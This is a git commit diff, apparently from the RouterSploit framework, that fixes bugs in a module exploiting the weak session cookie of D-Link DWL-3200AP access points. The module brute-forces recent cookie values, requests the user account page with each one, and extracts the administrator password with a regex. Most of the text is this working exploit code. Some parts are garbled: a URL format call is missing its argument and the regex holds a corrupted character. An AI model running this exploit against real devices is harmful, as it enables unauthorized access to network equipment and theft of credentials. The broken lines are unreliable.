Commit aae60fb8 by lucyoa

Fixing minor bugs, methods, type conversion

parent 514a62eb
......@@ -14,11 +14,11 @@ from routersploit import (
class Exploit(exploits.Exploit):
Exploits DLINK DWL3200 access points weak cookie value
Exploits D-Link DWL-3200AP access points weak cookie value
__info__ = {
'name': 'D-Link AP 3200 - Password Disclosure',
'description': 'Exploits DLINK DWL3200 access points weak cookie value',
'name': 'D-Link DWL-3200AP Password Disclosure',
'description': 'Exploits D-Link DWL3200 access points weak cookie value',
'authors': [
'pws', # Vulnerability discovery
'Josh Abraham <sinisterpatrician[at]>', # routersploit module
......@@ -27,21 +27,25 @@ class Exploit(exploits.Exploit):
'devices': [
'DLINK DWL3200',
'D-Link DWL-3200AP',
target = exploits.Option('', 'Target address e.g.', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
# 3600 seconds - one hour means that we will bruteforce authenticated cookie value that was valid within last hour
seconds = exploits.Option(3600, 'Number of seconds in the past to bruteforce')
def run(self):
if self.check():
cookie_value = self.get_cookie()
print_success("Cookie retrieved: {}".format(cookie_value))
cookie_int = int(cookie_value, 16)
start = cookie_int - 3600
start = cookie_int - int(self.seconds)
print_status("Starting bruteforcing cookie value...")
for i in xrange(cookie_int, start, -1):
......@@ -74,14 +78,14 @@ class Exploit(exploits.Exploit):
except Exception:
print_error("Unable to connect to target")
def test_cookie(cookie_int, self):
def test_cookie(self, cookie_int):
Method that tests all cookies from past hour to find one that is valid
Method that tests all cookies from the past to find one that is valid
url = "{}:{}/html/tUserAccountControl.htm".format(, self.port)
cookie = dict(RpWebID=cookie_int)
cookies = dict(RpWebID=str(cookie_int))
r = http_request(method='GET', url=url, cookie=cookie, timeout=10)
r = http_request(method='GET', url=url, cookies=cookies, timeout=10)
if ('NAME="OldPwd"' in r.text):
print_success("Cookie {} is valid!".format(cookie_int))
pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
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